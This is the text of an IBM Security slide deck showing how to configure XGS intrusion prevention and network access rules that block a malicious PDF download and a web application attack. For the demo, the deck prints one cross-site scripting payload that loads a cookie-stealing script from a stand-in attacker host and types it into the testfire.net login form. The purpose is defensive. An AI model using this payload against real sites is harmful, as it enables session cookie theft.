View
2
Download
0
Category
Preview:
Citation preview
© 2015 IBM Corporation
Jenson John, Padmaja DeshmukhL2 Technical EngineerIBM Security Systems
February 22, 2016
Configuring an Intrusion Prevention Policy for blocking malicious files and blocking web application attacks
2© 2015 IBM Corporation
Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block file-based attacks.
Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.
Use cases
3© 2015 IBM Corporation
In this scenario, XGS blocks a malicious file when an end user attempts to download it from a vulnerable web server.
Use-case1: Topology
4© 2015 IBM Corporation
Accessing the Intrusion Prevention Policy
To navigate to the Intrusion Prevention Policy on the XGS LMI, click the Secure Policy Configuration link from the main menu and then click Intrusion Prevention Policy under the Security Policies.
5© 2015 IBM Corporation
Accessing and editing Default IPS object
Expand the left panel, select the Default IPS object. Right-click the Default IPS object and select Edit.
6© 2015 IBM Corporation
Editing IPS object
7© 2015 IBM Corporation
Enabling the Event Log
Add the Event Log object to Added Objects. Click Save Configuration and Deploy.
8© 2015 IBM Corporation
Accessing Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the main menu and then click Network Access Policy under the Security Policies.
9© 2015 IBM Corporation
Configuring a Network Access Rule Click the New button to open the Add Network Access Rule window. On the General Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to Accept.
10© 2015 IBM Corporation
Response Tab
In the Response Tab, you can add an Event Log Object.
11© 2015 IBM Corporation
Source Tab In the Source Tab, select Any (indicates: Any Source)
12© 2015 IBM Corporation
Destination Tab In the Destination Tab, select Any (indicates : Any Destination)
13© 2015 IBM Corporation
Application Tab
In the Application tab, select Any.
14© 2015 IBM Corporation
Inspection Tab
In the Inspection tab, add the Default IPS inspection object.
Note: You can attach inspection objects to network access policy rules in conjunction with other network objects to filter certain traffic or events.
15© 2015 IBM Corporation
Deploy Network Access Policy
After the rule is created, click on Save Configuration and deploy the NAP policy.
16© 2015 IBM Corporation
Downloading the malicious file
17© 2015 IBM Corporation
Viewing the IPS Events
To view the IPS events, go to Monitor Analysis and Diagnostics > Logs > select IPS Events
18© 2015 IBM Corporation
Log showing XGS detected and blocked malicious file
Under IPS Events > Pause Live Streaming, the U3D_Adobe_Memory_Corruption event is triggered on downloading the malicious PDF file.
19© 2015 IBM Corporation
View the IPS event details
Select the Event, and click on View Details to view more details.
20© 2015 IBM Corporation
● Configuring a Network Access Policy that contains an Intrusion Prevention Policy to block web application attacks.
Use-case: 2
21© 2015 IBM Corporation
In this scenario, XGS blocks a web application attack when an end user attempts to inject a malicious script into a vulnerable web server.
Use-case 2: Topology
22© 2015 IBM Corporation
Accessing Intrusion Prevention Policy
Navigating in the Local Management Interface: Click Secure, and then click Intrusion Prevention Policy.
23© 2015 IBM Corporation
In the IPS Objects pane, click New > Inspection > Intrusion Prevention
24© 2015 IBM Corporation
Response Tab• In the response tab, you can enable Event Log, capture connection and
capture packet.
• It also include configuring notifications about events through email, SNMP, and remote syslog alerts.
25© 2015 IBM Corporation
New IPS object “Demo-WAP” is listed under the Inspection object
26© 2015 IBM Corporation
Adding filters
27© 2015 IBM Corporation
Enabling some of the Web Application Protection Signatures and setting them to block
28© 2015 IBM Corporation
Navigating in the Local Management Interface: Click Secure, and then click Network Access Policy.
Accessing Network Access Policy
29© 2015 IBM Corporation
Configuring a Network Access Rule
Click the New button to add a new Network Access Rule.
30© 2015 IBM Corporation
General Configuration Tab
31© 2015 IBM Corporation
Response Tab
32© 2015 IBM Corporation
Source Tab
33© 2015 IBM Corporation
Destination Tab
34© 2015 IBM Corporation
Application Tab
35© 2015 IBM Corporation
Inspection Tab
36© 2015 IBM Corporation
Schedule Tab
37© 2015 IBM Corporation
Tip : Place specific rules before general ones because rules are applied in the order they are listed in the Network Access Policy page.
38© 2015 IBM Corporation
Simulating a Web Application Attack
Launch a browser & access the vulnerable web server- www.testfire.net Click the Sign In link :
39© 2015 IBM Corporation
Adding a script to the Sign In page
For username, enter the above script and for password, enter any string. Click Login
<script src=”http://hackerx.org/stealcookie.js”></script>
40© 2015 IBM Corporation
XGS blocks the access
41© 2015 IBM Corporation
Viewing the IPS Events
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log. Select the IPS Events tab.
42© 2015 IBM Corporation
Event generated by XGS for associated attack
43© 2015 IBM Corporation
Event Detail
44© 2015 IBM Corporation
References
Configuring Network Access Policy:https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_about_acl_rules.htm
Configuring Intrusion Prevention Policy:https://www-
01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/concepts/alps_intrusion_prevention_policy_container.htm
Knowledge center for XGS:https://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.3.2/com.ibm.alps.doc/alps_collateral/alps_dochome_stg.htm
X-Force Virtual Patch Protection Levels for XGS and GX:http://www-01.ibm.com/support/docview.wss?uid=swg21701441
© 2015 IBM Corporation
Questions ?
46© 2015 IBM Corporation
Chat with IBM Technical Support
© 2015 IBM Corporation
Subscribe to our Channel
https://www.youtube.com/user/IBMSecuritySupport
© Copyright IBM Corporation 2015. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT ANY SYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.
THANK YOUwww.ibm.com/security
Recommended